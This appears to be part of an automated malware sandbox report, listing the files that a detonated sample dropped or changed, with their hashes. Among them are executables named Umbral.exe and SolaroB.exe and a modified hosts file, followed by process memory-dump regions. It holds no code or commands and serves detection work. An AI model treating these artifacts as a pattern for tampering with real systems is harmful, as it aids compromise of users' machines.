bf209de0dbc1dbe7c5b5b511bd34bf447a3c049b

SHA256
79ce6d6caea4a9eabf8fdbb2a1c58d43fb5a3c500c2dec3fce87c160d2c6bda3

SHA512
aa01195e5c1d641304b08fed4a3bffc916972aa0bc20e928204cef1783f38922a03b761cf2010ccbace1ea0d2f18cda4eaeee4d8969f32fbae5f580e4e38522d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
8bbd6908e148d61010a3130cb6aae4a0

SHA1
e74bcc1b0f762fcd7469d0621b9c7fe50b0c365d

SHA256
79c8ed7085737723dbc7c40b32d01ea400171787259b7458561cd5db60401023

SHA512
38057edb5f2ce86329f558bf34224c6110443635756b1b26da99f89b13e3f971bf602939f40d3fce8459cfdab4ad4fa4928ecb933ff045173535fcc46fe4855f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
88be3bc8a7f90e3953298c0fdbec4d72

SHA1
f4969784ad421cc80ef45608727aacd0f6bf2e4b

SHA256
533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

SHA512
4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8b1c20efb837dcc63e3e20c8c0ae0436

SHA1
7ef76c7f6a457c8cb7255714b0a334f087f1945c

SHA256
3fc5b41740f2f92c4856947330e7a15c840d68198921e5a0fd99b600f4b3a647

SHA512
545a41707e5163a5c0bf0895ddc697897d244ccb752aa45657ff13c8dc21aada7ff12d5e178f8dc0f59a04bbb1a094b8ff9c5171078a8e606bbae20e9d831bb7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
36bb833bcefdd2f80a289fc681c87627

SHA1
4204fa10680f0a9c2699a9eb52709db1cd68e0b7

SHA256
52be5401760e6cc30c6018d277e7ce91aa262b3888297f76e95a20fdda8e2ae6

SHA512
233fbb528d3b7196fb967fff74e66dd589b6a302e97774a24fbeb971996aa6c1b17f24f19380873c976978552e245b3dd065cdb9d4133ce554c507d92f8778e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
f4bf3ca8753d6bb9725419fec1ec74b9

SHA1
71fce9d17d1d92873236a9a827c52eb9e4827f3d

SHA256
ca8697e4ada4c3d4aac2899b8aad4052ccd605fccee05ee0a831368bde2f7417

SHA512
a55a107ae8bcf833ea674413c765cd55096146c9634dff41884fcc851c12fe47753308099525c99ae44883facfb668c8b292dd915263f34ebd1190391cb28a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f02abc9024612c398416c2ffc6714cd1

SHA1
1dcc103dc68ba954ecd1a2c9229237ebf6534956

SHA256
05410dbad347c52be976902e0e1806b07c49de40bc49bedf277a534d38d6762c

SHA512
fef6c9a795d2a4e5d927ebc5cffcc01ed3abc199164c084c02a898d8363512709e0fcf460e1178418a5d114ca242ea69ef504794a06f2a1eff8b8ba981e572bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
db9a3d8408e0b06f6b91ceee78eaba50

SHA1
0be587d47677e26aaef8c1fc28335c5996fd87c1

SHA256
c94e48154975c94b018a3ad123fc699400adfb4ab37880fbc225f230dc17be67

SHA512
0fabd66b7ed637fe7272c1a04ff2edc1bd1013fb72c7a9382cf35b8e6ee614dd536bc11904bc831d4d36309827e740159f401dcf3428f0e3a16562f1f8eb3b9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
104d2b7e555fcf10c30c1d1f20513f35

SHA1
590857073b989475390979247c5310190fbbf00a

SHA256
24044ce3b4e7bc0e97e9e3f70c88e0645ccf02f7c92338832c087a8e7fd3a314

SHA512
f775e424622e13348b0f9a2dd43a4cb3144d7df14229bd88c8c004dd15776b0743c892972f1faf59aaf0d30a9702449ba65a8fb7f1363039b7f0286be3852c83

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2a75c2057536d71d287d7cefff04eec3

SHA1
c61131dee25db97244118daaf982c0bd1389b8b4

SHA256
93cf99b87df289b80cc8be11623fbb0b09812f2dcee9986e76cedb188ca942a0

SHA512
1d8877aeade86757fb7d37b54abf27e8d6579a7a51bcbba549bcfd0c66a2b4383ab7f34eb4621c031262df4e5266332e1427f64af268922e24c24ed9ca94f150

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ec79fae4e7c09310ebf4f2d85a33a638

SHA1
f2bdd995b12e65e7ed437d228f22223b59e76efb

SHA256
e9c4723a5fe34e081c3d2f548a1d472394cc7aa58056fcf44ca542061381243a

SHA512
af9dda12f6bb388d826fe03a4a8beed9bda23a978aa55a2af6a43271660ee896a7ee3bcf2c4d2f1e6180902791d8c23560f1c2ec097a501d8c6f4f6c49075625

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
c41224ab6e2a713aff7b0128890716be

SHA1
b3525f9c3f583284b084fb88ae14a803fad84e04

SHA256
ee0f2a4ee399ef57c54d83bd611d11fb22ce2edc405db819a2a371b8a5192fd2

SHA512
25c71ac3f2ee6b0ccadd7549b7d8a42a964d0305d8758dfae53ce78eeaf52432380715ff545d95645e0e00d3b3b6c678f17eb16b2e9606d64988ffde82dfbc4c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
985b3105d8889886d6fd953575c54e08

SHA1
0f9a041240a344d82bac0a180520e7982c15f3cd

SHA256
5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d

SHA512
0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ec1ba4a995d866b282087b26a0539bbc

SHA1
c4aeae2bc3fa9a898680648b20102f01e8a811cf

SHA256
469da678c3c0364b1b511962cffd44cbfc10aab5c1c528c0c09fd952f08d8a2c

SHA512
07bf757ec9d0d368d3ef1bfc2b562895e2708757f8fefa04fa50beaa6fb38af1018ea0cfccf5666c5c8baa4c894deead9652c53e0608aa6a83ef5b396dba43e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
af283a45e468abc28a9ac1c14af0a45d

SHA1
6d70a604e1a12e0df9b98a4bf57d335d78986c93

SHA256
141a5cbf854b091471384f71c93282c31d166a8676d43559c38086dd6e07229c

SHA512
05abb1f812dd979755e811928006974bccf076e8f618061e64db35b129bb78175a99bac6eefa5e11f6f3c4af94f60e9b7da4c4ba07fa740748ff47a4511d4db8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\8PJtxYPyWTOaFiU\Display\Display.png

Filesize
437KB

MD5
12cc4b2231980636695d784d44dc4f5d

SHA1
93d76e21b7338a5178aa95aa91508877b61f4366

SHA256
5073219332bbdbc52bc5905a87e2084c4db89e4cb461b459762f407f135d2e5b

SHA512
d6f1f687f15608d881257995b178ad06b134e7690477963505c0e0cf406717d46dd42af8dcf72e32acc242f168ae327b9d90a546740ac9105e8f5ca107ad9692

Download Submit
C:\Users\Admin\AppData\Local\Temp\IYuH26UyGzDSPDN

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\IYuH26UyGzDSPDN

Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\SolaroB.exe

Filesize
416KB

MD5
61c0431f9f53ae84d9907354c08c997d

SHA1
e2bc204b091c5bd391261fecdc5e5c81e2d7c129

SHA256
cade9d8c77eaf397cf2fd28e0bab0becc79a66b2c6a9d338e2d8411d62e757b2

SHA512
950ffd12606be726374241977e8094a992b5a91afbf841eca1f7f43e8f2d3bddac743ff03a18700570a399db4b6f324fd79213d53c1c523bf375f5ecaf16d6e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Umbral.exe

Filesize
230KB

MD5
d5a61fff058c6015802f7dc8c75684d1

SHA1
60170c1a41b778c17ba886b7f6ec71c1ab6cfd44

SHA256
3e0d91b0c5b67446c6fcbb9f30d079dd54381d6fdea2cec74f4dcc0e2334b155

SHA512
537b85584a931a7984fccbc62a41c92d406c399212d9b25fdac39b14e12f0d82be67583c88d1b70bf9c0a8c0cf2d5a7c6fcfbf83332bf251e2afe3767232338d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tezusoyh.ws0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aAYSb89vICdTPZy

Filesize
20KB

MD5
42c395b8db48b6ce3d34c301d1eba9d5

SHA1
b7cfa3de344814bec105391663c0df4a74310996

SHA256
5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d

SHA512
7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

Download Submit
C:\Users\Admin\AppData\Local\Temp\wrjso7KwH5QyPtB

Filesize
46KB

MD5
8f5942354d3809f865f9767eddf51314

SHA1
20be11c0d42fc0cef53931ea9152b55082d1a11e

SHA256
776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea

SHA512
fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/432-1298-0x00000215CAE90000-0x00000215CB0AC000-memory.dmp

Filesize
2.1MB

Download
memory/532-14-0x00007FFDB32A0000-0x00007FFDB3D61000-memory.dmp

Filesize
10.8MB

Download
memory/532-27-0x00007FFDB32A0000-0x00007FFDB3D61000-memory.dmp

Filesize
10.8MB

Download
memory/532-1-0x0000000000B50000-0x0000000000BD6000-memory.dmp

Filesize
536KB

Download
memory/532-0-0x00007FFDB32A3000-0x00007FFDB32A5000-memory.dmp

Filesize
8KB

Download
memory/556-1580-0x00000245AC740000-0x00000245AC95C000-memory.dmp

Filesize
2.1MB

Download
memory/1180-526-0x00000185B0320000-0x00000185B0422000-memory.dmp

Filesize
1.0MB

Download
memory/1228-454-0x000001CB1EF90000-0x000001CB1F092000-memory.dmp

Filesize
1.0MB

Download
memory/1480-1086-0x000001647EF60000-0x000001647F17C000-memory.dmp

Filesize
2.1MB

Download
memory/1484-1227-0x00000274F3840000-0x00000274F3A5C000-memory.dmp

Filesize
2.1MB

Download
memory/1520-806-0x0000021378EC0000-0x0000021378FC2000-memory.dmp

Filesize
1.0MB

Download
memory/1532-288-0x0000028EDCCF0000-0x0000028EDCDF2000-memory.dmp

Filesize
1.0MB

Download
memory/1752-40-0x0000026BFAE60000-0x0000026BFAE82000-memory.dmp

Filesize
136KB

Download
memory/1992-1439-0x0000019AB8BB0000-0x0000019AB8DCC000-memory.dmp

Filesize
2.1MB

Download
memory/3124-735-0x00000219BC3F0000-0x00000219BC4F2000-memory.dmp

Filesize
1.0MB

Download
memory/3248-594-0x0000019EA9BD0000-0x0000019EA9DEC000-memory.dmp

Filesize
2.1MB

Download
memory/3388-30-0x00007FFDB32A0000-0x00007FFDB3D61000-memory.dmp

Filesize
10.8MB

Download
memory/3388-58-0x000001DE30080000-0x000001DE300D0000-memory.dmp

Filesize
320KB

Download
memory/3388-100-0x000001DE30050000-0x000001DE3005A000-memory.dmp

Filesize
40KB

Download
memory/3388-101-0x000001DE300D0000-0x000001DE300E2000-memory.dmp

Filesize
72KB

Download
memory/3388-59-0x000001DE17940000-0x000001DE1795E000-memory.dmp

Filesize
120KB

Download
memory/3388-122-0x00007FFDB32A0000-0x00007FFDB3D61000-memory.dmp

Filesize
10.8MB

Download
memory/3388-57-0x000001DE30340000-0x000001DE303B6000-memory.dmp

Filesize
472KB

Download
memory/3388-25-0x000001DE15BB0000-0x000001DE15BF0000-memory.dmp

Filesize
256KB

Download
memory/3620-877-0x00000222F19A0000-0x00000222F1AA2000-memory.dmp

Filesize
1.0MB

Download
memory/4084-205-0x000001B46AC70000-0x000001B46AD72000-memory.dmp

Filesize
1.0MB

Download
memory/4332-29-0x00000000004B0000-0x000000000051E000-memory.dmp

Filesize
440KB

Download
memory/4332-28-0x00007FFDB32A0000-0x00007FFDB3D61000-memory.dmp

Filesize
10.8MB

Download
memory/4332-97-0x00007FFDB32A0000-0x00007FFDB3D61000-memory.dmp

Filesize
10.8MB

Download
memory/4424-366-0x000001A2F3650000-0x000001A2F386C000-memory.dmp

Filesize
2.1MB

Download
memory/4840-948-0x00000236BC9F0000-0x00000236BCAF2000-memory.dmp

Filesize
1.0MB

Download
memory/4988-1651-0x000001BE333E0000-0x000001BE335FC000-memory.dmp

Filesize
2.1MB

Download